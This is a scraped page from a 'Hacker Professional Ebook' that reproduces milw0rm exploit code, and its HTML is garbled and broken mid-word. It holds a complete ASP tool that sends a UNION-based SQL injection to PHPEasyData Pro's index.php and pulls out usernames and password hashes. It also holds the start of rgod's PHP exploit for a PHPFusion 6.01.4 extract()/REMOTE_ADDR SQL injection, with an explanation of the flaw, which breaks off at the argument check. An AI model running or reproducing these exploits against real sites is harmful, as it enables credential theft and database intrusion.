
Hacker Professional Ebook part 413 potx



008000"> <center> <font face="Verdana" size="2" color="#008000"><b><a href="exploit3.asp" >PHPEasyData Pro </b>v2.2.2 (index.php) <u><b> Remote SQL Injection Exploit</b></u></a></font><br><br> <table border="1" cellpadding="0" cellspacing="0" style="border- collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style. background='#808080';" onmouseout="javascript:this.style.background='#80 8000';"> <font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</fon t>Example:[http://x.com/path]</b></font><p> <b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b> <font face="Arial" size="1"><b>Example:[User ID=1]</b></font></td> <td width="50%"><center> <form method="post" name="form1" action="exploit3.asp?islem=get"> <input type="text" name="text1" value="http://" size="25" style="backgroun d- color: #808080"><br><input type="text" name="id" value="5" size="25" styl e="background-color: #808080"> <input type="submit" value="Get"></center></td> </tr> </table> <div id=htmlAlani></div> <% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please complete to the whole spaces</font>" End If If islem = "hata2" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! Please right character use</font>" End If If islem = "hata3" Then Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">Th ere is a problem! 
Add ""http://""</font>" End If %> <% If islem = "get" Then string1="/index.php?cat=-1%20union%20" string2="select%200,concat(user_login,char(32)" string3=",user_pass),0,0," string4="0%20from%20an_users%" string5="20where%20user_id%20" string6="like%20" string7=Request.Form("id") string8="/*" targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit3.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit3.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit3.asp?islem=hata3") Else %> <% target1 = targettext+string1+string2+string3+string4+string5+string6+string7 +string8 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) getdata=InStr(get_username,"""box-content"">" ) username=Mid(get_username,getdata+14,60) %> <center> <font face="Verdana" size="2" color="#008000"> <u><b> ajann<br></b></u></font> <table border="1" cellpadding="0" cellspacing="0" style="border- collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808 080" bordercolordark="#008000" bordercolor="#808080"> <tr> <td width="50%" bgcolor="#808000" onmouseover="javascript:this.style. 
background='#808080';" onmouseout="javascript:this.style.background='#80 8000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;&nbsp; <b><font size="2" face="Arial">Data:</font></b></td> <td width="80%"> &nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=guvenlik( username)%></b></font></p> </td> </tr> </table> <form method="POST" name="form2" action="#"> <input type="hidden" name="field1" size="20" value="<%=username%>">< /p> </form> </center> <script language="JavaScript"> write() functionControl1() </script> </body> </html> <% End If End If End If End If Set objtake = Nothing %> # milw0rm.com [2006-10-29] sexyvirus(HCE) PHPFusion <= 6.01.4 sql injection exploit Code: #!/usr/bin/php -q -d short_open_tag=on <? print_r(' PHPFusion <= 6.01.4 extract()/_SERVER[REMOTE_ADDR] sql injection exploit by rgod rgod@autistici.org site: http://retrogod.altervista.org '); /* works with register globals = *Off* magic_quotes_gpc = Off explanation: vulnerable code in maincore.php at lines 15-21: if (ini_get('register_globals') != 1) { $supers = array("_REQUEST","_ENV","_SERVER","_POST","_GET","_COOKIE","_SESSION","_FILES","_GLOBALS"); foreach ($supers as $__s) { if ((isset($$__s) == true) && (is_array($$__s) == true)) extract($$__s, EXTR_OVERWRITE); } unset($supers); } the extract() function can be a security hazard: here it is called with EXTR_OVERWRITE on request-supplied arrays, so a request parameter named _SERVER[...] can overwrite entries of the _SERVER[] array that the application treats as server-supplied, which makes an sql injection attack possible, ex: http://[target]/[path]/news.php?_SERVER[REMOTE_ADDR]='[SQL] other attacks may be possible; on the application side the durable fix is to drop this extract() loop and to escape values such as REMOTE_ADDR before they reach a query */ if ($argc<3) {

Ngày đăng: 04/07/2014, 12:20